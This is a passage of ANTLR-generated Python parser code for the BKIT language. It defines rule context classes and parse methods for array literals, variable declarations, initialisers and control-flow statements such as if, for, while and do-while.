self.getTypedRuleContext(BKITParser.Primitive_dataContext,i)\n\n\n def composite_data(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.Composite_dataContext)\n else:\n return self.getTypedRuleContext(BKITParser.Composite_dataContext,i)\n\n\n def COMMA(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.COMMA)\n else:\n return self.getToken(BKITParser.COMMA, i)\n\n def getRuleIndex(self):\n return BKITParser.RULE_array_lit\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitArray_lit\" ):\n return visitor.visitArray_lit(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n\n def array_lit(self):\n\n localctx = BKITParser.Array_litContext(self, self._ctx, self.state)\n self.enterRule(localctx, 12, self.RULE_array_lit)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 139\n self.match(BKITParser.LEFT_BRACE)\n self.state = 154\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n if (((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << BKITParser.INT_LIT) | (1 << BKITParser.FLOAT_LIT) | (1 << BKITParser.BOOL_LIT) | (1 << BKITParser.STRING_LIT) | (1 << BKITParser.LEFT_BRACE))) != 0):\n self.state = 142\n self._errHandler.sync(self)\n token = self._input.LA(1)\n if token in [BKITParser.INT_LIT, BKITParser.FLOAT_LIT, BKITParser.BOOL_LIT, BKITParser.STRING_LIT]:\n self.state = 140\n self.primitive_data()\n pass\n elif token in [BKITParser.LEFT_BRACE]:\n self.state = 141\n self.composite_data()\n pass\n else:\n raise NoViableAltException(self)\n\n self.state = 151\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n while _la==BKITParser.COMMA:\n self.state = 144\n self.match(BKITParser.COMMA)\n self.state = 147\n self._errHandler.sync(self)\n token = self._input.LA(1)\n if token in [BKITParser.INT_LIT, BKITParser.FLOAT_LIT, BKITParser.BOOL_LIT, BKITParser.STRING_LIT]:\n self.state = 145\n self.primitive_data()\n pass\n elif token in 
[BKITParser.LEFT_BRACE]:\n self.state = 146\n self.composite_data()\n pass\n else:\n raise NoViableAltException(self)\n\n self.state = 153\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n\n\n\n self.state = 156\n self.match(BKITParser.RIGHT_BRACE)\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Var_listContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def var_non_init(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.Var_non_initContext)\n else:\n return self.getTypedRuleContext(BKITParser.Var_non_initContext,i)\n\n\n def var_init(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.Var_initContext)\n else:\n return self.getTypedRuleContext(BKITParser.Var_initContext,i)\n\n\n def COMMA(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.COMMA)\n else:\n return self.getToken(BKITParser.COMMA, i)\n\n def getRuleIndex(self):\n return BKITParser.RULE_var_list\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitVar_list\" ):\n return visitor.visitVar_list(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n\n def var_list(self):\n\n localctx = BKITParser.Var_listContext(self, self._ctx, self.state)\n self.enterRule(localctx, 14, self.RULE_var_list)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 160\n self._errHandler.sync(self)\n la_ = self._interp.adaptivePredict(self._input,9,self._ctx)\n if la_ == 1:\n self.state = 158\n self.var_non_init()\n pass\n\n elif la_ == 2:\n self.state = 159\n self.var_init()\n pass\n\n\n self.state = 169\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n while _la==BKITParser.COMMA:\n self.state = 
162\n self.match(BKITParser.COMMA)\n self.state = 165\n self._errHandler.sync(self)\n la_ = self._interp.adaptivePredict(self._input,10,self._ctx)\n if la_ == 1:\n self.state = 163\n self.var_non_init()\n pass\n\n elif la_ == 2:\n self.state = 164\n self.var_init()\n pass\n\n\n self.state = 171\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Scalar_varContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def ID(self):\n return self.getToken(BKITParser.ID, 0)\n\n def getRuleIndex(self):\n return BKITParser.RULE_scalar_var\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitScalar_var\" ):\n return visitor.visitScalar_var(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n\n def scalar_var(self):\n\n localctx = BKITParser.Scalar_varContext(self, self._ctx, self.state)\n self.enterRule(localctx, 16, self.RULE_scalar_var)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 172\n self.match(BKITParser.ID)\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Var_non_initContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def ID(self):\n return self.getToken(BKITParser.ID, 0)\n\n def LEFT_BRACKET(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.LEFT_BRACKET)\n else:\n return self.getToken(BKITParser.LEFT_BRACKET, i)\n\n def INT_LIT(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.INT_LIT)\n 
else:\n return self.getToken(BKITParser.INT_LIT, i)\n\n def RIGHT_BRACKET(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.RIGHT_BRACKET)\n else:\n return self.getToken(BKITParser.RIGHT_BRACKET, i)\n\n def getRuleIndex(self):\n return BKITParser.RULE_var_non_init\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitVar_non_init\" ):\n return visitor.visitVar_non_init(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n\n def var_non_init(self):\n\n localctx = BKITParser.Var_non_initContext(self, self._ctx, self.state)\n self.enterRule(localctx, 18, self.RULE_var_non_init)\n try:\n self.state = 183\n self._errHandler.sync(self)\n la_ = self._interp.adaptivePredict(self._input,13,self._ctx)\n if la_ == 1:\n self.enterOuterAlt(localctx, 1)\n self.state = 174\n self.match(BKITParser.ID)\n self.state = 178 \n self._errHandler.sync(self)\n _alt = 1\n while _alt!=2 and _alt!=ATN.INVALID_ALT_NUMBER:\n if _alt == 1:\n self.state = 175\n self.match(BKITParser.LEFT_BRACKET)\n self.state = 176\n self.match(BKITParser.INT_LIT)\n self.state = 177\n self.match(BKITParser.RIGHT_BRACKET)\n\n else:\n raise NoViableAltException(self)\n self.state = 180 \n self._errHandler.sync(self)\n _alt = self._interp.adaptivePredict(self._input,12,self._ctx)\n\n pass\n\n elif la_ == 2:\n self.enterOuterAlt(localctx, 2)\n self.state = 182\n self.match(BKITParser.ID)\n pass\n\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Composite_varContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def ID(self):\n return self.getToken(BKITParser.ID, 0)\n\n def LEFT_BRACKET(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.LEFT_BRACKET)\n else:\n return 
self.getToken(BKITParser.LEFT_BRACKET, i)\n\n def RIGHT_BRACKET(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.RIGHT_BRACKET)\n else:\n return self.getToken(BKITParser.RIGHT_BRACKET, i)\n\n def composite_var(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.Composite_varContext)\n else:\n return self.getTypedRuleContext(BKITParser.Composite_varContext,i)\n\n\n def expr(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.ExprContext)\n else:\n return self.getTypedRuleContext(BKITParser.ExprContext,i)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_composite_var\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitComposite_var\" ):\n return visitor.visitComposite_var(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n\n def composite_var(self):\n\n localctx = BKITParser.Composite_varContext(self, self._ctx, self.state)\n self.enterRule(localctx, 20, self.RULE_composite_var)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 185\n self.match(BKITParser.ID)\n self.state = 193 \n self._errHandler.sync(self)\n _la = self._input.LA(1)\n while True:\n self.state = 186\n self.match(BKITParser.LEFT_BRACKET)\n self.state = 189\n self._errHandler.sync(self)\n la_ = self._interp.adaptivePredict(self._input,14,self._ctx)\n if la_ == 1:\n self.state = 187\n self.composite_var()\n pass\n\n elif la_ == 2:\n self.state = 188\n self.expr()\n pass\n\n\n self.state = 191\n self.match(BKITParser.RIGHT_BRACKET)\n self.state = 195 \n self._errHandler.sync(self)\n _la = self._input.LA(1)\n if not (_la==BKITParser.LEFT_BRACKET):\n break\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Var_initContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, 
invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def ASSIGN(self):\n return self.getToken(BKITParser.ASSIGN, 0)\n\n def ID(self):\n return self.getToken(BKITParser.ID, 0)\n\n def scalar_var(self):\n return self.getTypedRuleContext(BKITParser.Scalar_varContext,0)\n\n\n def composite_data(self):\n return self.getTypedRuleContext(BKITParser.Composite_dataContext,0)\n\n\n def primitive_data(self):\n return self.getTypedRuleContext(BKITParser.Primitive_dataContext,0)\n\n\n def LEFT_BRACKET(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.LEFT_BRACKET)\n else:\n return self.getToken(BKITParser.LEFT_BRACKET, i)\n\n def INT_LIT(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.INT_LIT)\n else:\n return self.getToken(BKITParser.INT_LIT, i)\n\n def RIGHT_BRACKET(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.RIGHT_BRACKET)\n else:\n return self.getToken(BKITParser.RIGHT_BRACKET, i)\n\n def getRuleIndex(self):\n return BKITParser.RULE_var_init\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitVar_init\" ):\n return visitor.visitVar_init(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n\n def var_init(self):\n\n localctx = BKITParser.Var_initContext(self, self._ctx, self.state)\n self.enterRule(localctx, 22, self.RULE_var_init)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 206\n self._errHandler.sync(self)\n la_ = self._interp.adaptivePredict(self._input,17,self._ctx)\n if la_ == 1:\n self.state = 197\n self.match(BKITParser.ID)\n self.state = 201 \n self._errHandler.sync(self)\n _la = self._input.LA(1)\n while True:\n self.state = 198\n self.match(BKITParser.LEFT_BRACKET)\n self.state = 199\n self.match(BKITParser.INT_LIT)\n self.state = 200\n self.match(BKITParser.RIGHT_BRACKET)\n self.state = 203 \n self._errHandler.sync(self)\n _la = self._input.LA(1)\n if not (_la==BKITParser.LEFT_BRACKET):\n 
break\n\n pass\n\n elif la_ == 2:\n self.state = 205\n self.scalar_var()\n pass\n\n\n self.state = 208\n self.match(BKITParser.ASSIGN)\n self.state = 211\n self._errHandler.sync(self)\n token = self._input.LA(1)\n if token in [BKITParser.LEFT_BRACE]:\n self.state = 209\n self.composite_data()\n pass\n elif token in [BKITParser.INT_LIT, BKITParser.FLOAT_LIT, BKITParser.BOOL_LIT, BKITParser.STRING_LIT]:\n self.state = 210\n self.primitive_data()\n pass\n else:\n raise NoViableAltException(self)\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Composite_initContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def composite_var(self):\n return self.getTypedRuleContext(BKITParser.Composite_varContext,0)\n\n\n def ASSIGN(self):\n return self.getToken(BKITParser.ASSIGN, 0)\n\n def array_lit(self):\n return self.getTypedRuleContext(BKITParser.Array_litContext,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_composite_init\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitComposite_init\" ):\n return visitor.visitComposite_init(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n\n def composite_init(self):\n\n localctx = BKITParser.Composite_initContext(self, self._ctx, self.state)\n self.enterRule(localctx, 24, self.RULE_composite_init)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 213\n self.composite_var()\n self.state = 214\n self.match(BKITParser.ASSIGN)\n self.state = 215\n self.array_lit()\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Primitive_initContext(ParserRuleContext):\n\n def 
__init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def scalar_var(self):\n return self.getTypedRuleContext(BKITParser.Scalar_varContext,0)\n\n\n def ASSIGN(self):\n return self.getToken(BKITParser.ASSIGN, 0)\n\n def primitive_data(self):\n return self.getTypedRuleContext(BKITParser.Primitive_dataContext,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_primitive_init\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitPrimitive_init\" ):\n return visitor.visitPrimitive_init(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n\n def primitive_init(self):\n\n localctx = BKITParser.Primitive_initContext(self, self._ctx, self.state)\n self.enterRule(localctx, 26, self.RULE_primitive_init)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 217\n self.scalar_var()\n self.state = 218\n self.match(BKITParser.ASSIGN)\n self.state = 219\n self.primitive_data()\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Params_listContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def var_non_init(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.Var_non_initContext)\n else:\n return self.getTypedRuleContext(BKITParser.Var_non_initContext,i)\n\n\n def COMMA(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.COMMA)\n else:\n return self.getToken(BKITParser.COMMA, i)\n\n def getRuleIndex(self):\n return BKITParser.RULE_params_list\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitParams_list\" ):\n return visitor.visitParams_list(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n\n def 
params_list(self):\n\n localctx = BKITParser.Params_listContext(self, self._ctx, self.state)\n self.enterRule(localctx, 28, self.RULE_params_list)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 221\n self.var_non_init()\n self.state = 226\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n while _la==BKITParser.COMMA:\n self.state = 222\n self.match(BKITParser.COMMA)\n self.state = 223\n self.var_non_init()\n self.state = 228\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Stmt_listContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def var_declare_stmt(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.Var_declare_stmtContext)\n else:\n return self.getTypedRuleContext(BKITParser.Var_declare_stmtContext,i)\n\n\n def SEMI(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.SEMI)\n else:\n return self.getToken(BKITParser.SEMI, i)\n\n def stmt(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.StmtContext)\n else:\n return self.getTypedRuleContext(BKITParser.StmtContext,i)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_stmt_list\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitStmt_list\" ):\n return visitor.visitStmt_list(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n\n def stmt_list(self):\n\n localctx = BKITParser.Stmt_listContext(self, self._ctx, self.state)\n self.enterRule(localctx, 30, self.RULE_stmt_list)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 234\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n while 
_la==BKITParser.VAR:\n self.state = 229\n self.var_declare_stmt()\n self.state = 230\n self.match(BKITParser.SEMI)\n self.state = 236\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n\n self.state = 240\n self._errHandler.sync(self)\n _alt = self._interp.adaptivePredict(self._input,21,self._ctx)\n while _alt!=2 and _alt!=ATN.INVALID_ALT_NUMBER:\n if _alt==1:\n self.state = 237\n self.stmt() \n self.state = 242\n self._errHandler.sync(self)\n _alt = self._interp.adaptivePredict(self._input,21,self._ctx)\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class StmtContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def if_stmt(self):\n return self.getTypedRuleContext(BKITParser.If_stmtContext,0)\n\n\n def for_stmt(self):\n return self.getTypedRuleContext(BKITParser.For_stmtContext,0)\n\n\n def while_stmt(self):\n return self.getTypedRuleContext(BKITParser.While_stmtContext,0)\n\n\n def dowhile_stmt(self):\n return self.getTypedRuleContext(BKITParser.Dowhile_stmtContext,0)\n\n\n def assign_stmt(self):\n return self.getTypedRuleContext(BKITParser.Assign_stmtContext,0)\n\n\n def SEMI(self):\n return self.getToken(BKITParser.SEMI, 0)\n\n def break_stmt(self):\n return self.getTypedRuleContext(BKITParser.Break_stmtContext,0)\n\n\n def continue_stmt(self):\n return self.getTypedRuleContext(BKITParser.Continue_stmtContext,0)\n\n\n def call_stmt(self):\n return self.getTypedRuleContext(BKITParser.Call_stmtContext,0)\n\n\n def return_stmt(self):\n return self.getTypedRuleContext(BKITParser.Return_stmtContext,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_stmt\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitStmt\" ):\n return visitor.visitStmt(self)\n else:\n 
return visitor.visitChildren(self)\n\n\n\n\n def stmt(self):\n\n localctx = BKITParser.StmtContext(self, self._ctx, self.state)\n self.enterRule(localctx, 32, self.RULE_stmt)\n try:\n self.state = 262\n self._errHandler.sync(self)\n la_ = self._interp.adaptivePredict(self._input,22,self._ctx)\n if la_ == 1:\n self.enterOuterAlt(localctx, 1)\n self.state = 243\n self.if_stmt()\n pass\n\n elif la_ == 2:\n self.enterOuterAlt(localctx, 2)\n self.state = 244\n self.for_stmt()\n pass\n\n elif la_ == 3:\n self.enterOuterAlt(localctx, 3)\n self.state = 245\n self.while_stmt()\n pass\n\n elif la_ == 4:\n self.enterOuterAlt(localctx, 4)\n self.state = 246\n self.dowhile_stmt()\n pass\n\n elif la_ == 5:\n self.enterOuterAlt(localctx, 5)\n self.state = 247\n self.assign_stmt()\n self.state = 248\n self.match(BKITParser.SEMI)\n pass\n\n elif la_ == 6:\n self.enterOuterAlt(localctx, 6)\n self.state = 250\n self.break_stmt()\n self.state = 251\n self.match(BKITParser.SEMI)\n pass\n\n elif la_ == 7:\n self.enterOuterAlt(localctx, 7)\n self.state = 253\n self.continue_stmt()\n self.state = 254\n self.match(BKITParser.SEMI)\n pass\n\n elif la_ == 8:\n self.enterOuterAlt(localctx, 8)\n self.state = 256\n self.call_stmt()\n self.state = 257\n self.match(BKITParser.SEMI)\n pass\n\n elif la_ == 9:\n self.enterOuterAlt(localctx, 9)\n self.state = 259\n self.return_stmt()\n self.state = 260\n self.match(BKITParser.SEMI)\n pass\n\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class If_stmtContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def IF(self):\n return self.getToken(BKITParser.IF, 0)\n\n def expr(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.ExprContext)\n else:\n return 
self.getTypedRuleContext(BKITParser.ExprContext,i)\n\n\n def THEN(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.THEN)\n else:\n return self.getToken(BKITParser.THEN, i)\n\n def stmt_list(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.Stmt_listContext)\n else:\n return self.getTypedRuleContext(BKITParser.Stmt_listContext,i)\n\n\n def ENDIF(self):\n return self.getToken(BKITParser.ENDIF, 0)\n\n def DOT(self):\n return self.getToken(BKITParser.DOT, 0)\n\n def ELSEIF(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.ELSEIF)\n else:\n return self.getToken(BKITParser.ELSEIF, i)\n\n def ELSE(self):\n return self.getToken(BKITParser.ELSE, 0)\n\n def getRuleIndex(self):\n return BKITParser.RULE_if_stmt\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitIf_stmt\" ):\n return visitor.visitIf_stmt(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n\n def if_stmt(self):\n\n localctx = BKITParser.If_stmtContext(self, self._ctx, self.state)\n self.enterRule(localctx, 34, self.RULE_if_stmt)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 264\n self.match(BKITParser.IF)\n self.state = 265\n self.expr()\n self.state = 266\n self.match(BKITParser.THEN)\n self.state = 267\n self.stmt_list()\n self.state = 275\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n while _la==BKITParser.ELSEIF:\n self.state = 268\n self.match(BKITParser.ELSEIF)\n self.state = 269\n self.expr()\n self.state = 270\n self.match(BKITParser.THEN)\n self.state = 271\n self.stmt_list()\n self.state = 277\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n\n self.state = 280\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n if _la==BKITParser.ELSE:\n self.state = 278\n self.match(BKITParser.ELSE)\n self.state = 279\n self.stmt_list()\n\n\n self.state = 282\n self.match(BKITParser.ENDIF)\n self.state = 283\n self.match(BKITParser.DOT)\n except 
RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Var_declare_stmtContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def var_declare(self):\n return self.getTypedRuleContext(BKITParser.Var_declareContext,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_var_declare_stmt\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitVar_declare_stmt\" ):\n return visitor.visitVar_declare_stmt(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n\n def var_declare_stmt(self):\n\n localctx = BKITParser.Var_declare_stmtContext(self, self._ctx, self.state)\n self.enterRule(localctx, 36, self.RULE_var_declare_stmt)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 285\n self.var_declare()\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class For_stmtContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def FOR(self):\n return self.getToken(BKITParser.FOR, 0)\n\n def LEFT_PAREN(self):\n return self.getToken(BKITParser.LEFT_PAREN, 0)\n\n def init_for(self):\n return self.getTypedRuleContext(BKITParser.Init_forContext,0)\n\n\n def COMMA(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.COMMA)\n else:\n return self.getToken(BKITParser.COMMA, i)\n\n def con_for(self):\n return self.getTypedRuleContext(BKITParser.Con_forContext,0)\n\n\n def update_for(self):\n return self.getTypedRuleContext(BKITParser.Update_forContext,0)\n\n\n def RIGHT_PAREN(self):\n return 
self.getToken(BKITParser.RIGHT_PAREN, 0)\n\n def DO(self):\n return self.getToken(BKITParser.DO, 0)\n\n def stmt_list(self):\n return self.getTypedRuleContext(BKITParser.Stmt_listContext,0)\n\n\n def ENDFOR(self):\n return self.getToken(BKITParser.ENDFOR, 0)\n\n def DOT(self):\n return self.getToken(BKITParser.DOT, 0)\n\n def getRuleIndex(self):\n return BKITParser.RULE_for_stmt\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitFor_stmt\" ):\n return visitor.visitFor_stmt(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n\n def for_stmt(self):\n\n localctx = BKITParser.For_stmtContext(self, self._ctx, self.state)\n self.enterRule(localctx, 38, self.RULE_for_stmt)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 287\n self.match(BKITParser.FOR)\n self.state = 288\n self.match(BKITParser.LEFT_PAREN)\n self.state = 289\n self.init_for()\n self.state = 290\n self.match(BKITParser.COMMA)\n self.state = 291\n self.con_for()\n self.state = 292\n self.match(BKITParser.COMMA)\n self.state = 293\n self.update_for()\n self.state = 294\n self.match(BKITParser.RIGHT_PAREN)\n self.state = 295\n self.match(BKITParser.DO)\n self.state = 296\n self.stmt_list()\n self.state = 297\n self.match(BKITParser.ENDFOR)\n self.state = 298\n self.match(BKITParser.DOT)\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class While_stmtContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def WHILE(self):\n return self.getToken(BKITParser.WHILE, 0)\n\n def expr(self):\n return self.getTypedRuleContext(BKITParser.ExprContext,0)\n\n\n def DO(self):\n return self.getToken(BKITParser.DO, 0)\n\n def stmt_list(self):\n return self.getTypedRuleContext(BKITParser.Stmt_listContext,0)\n\n\n def 
ENDWHILE(self):\n return self.getToken(BKITParser.ENDWHILE, 0)\n\n def DOT(self):\n return self.getToken(BKITParser.DOT, 0)\n\n def getRuleIndex(self):\n return BKITParser.RULE_while_stmt\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitWhile_stmt\" ):\n return visitor.visitWhile_stmt(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n\n def while_stmt(self):\n\n localctx = BKITParser.While_stmtContext(self, self._ctx, self.state)\n self.enterRule(localctx, 40, self.RULE_while_stmt)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 300\n self.match(BKITParser.WHILE)\n self.state = 301\n self.expr()\n self.state = 302\n self.match(BKITParser.DO)\n self.state = 303\n self.stmt_list()\n self.state = 304\n self.match(BKITParser.ENDWHILE)\n self.state = 305\n self.match(BKITParser.DOT)\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Dowhile_stmtContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def DO(self):\n return self.getToken(BKITParser.DO, 0)\n\n def stmt_list(self):\n return self.getTypedRuleContext(BKITParser.Stmt_listContext,0)\n\n\n def WHILE(self):\n return self.getToken(BKITParser.WHILE, 0)\n\n def expr(self):\n return self.getTypedRuleContext(BKITParser.ExprContext,0)\n\n\n def ENDDO(self):\n return self.getToken(BKITParser.ENDDO, 0)\n\n def DOT(self):\n return self.getToken(BKITParser.DOT, 0)\n\n def getRuleIndex(self):\n return BKITParser.RULE_dowhile_stmt\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitDowhile_stmt\" ):\n return visitor.visitDowhile_stmt(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n\n def dowhile_stmt(self):\n\n localctx = BKITParser.Dowhile_stmtContext(self, self._ctx, 
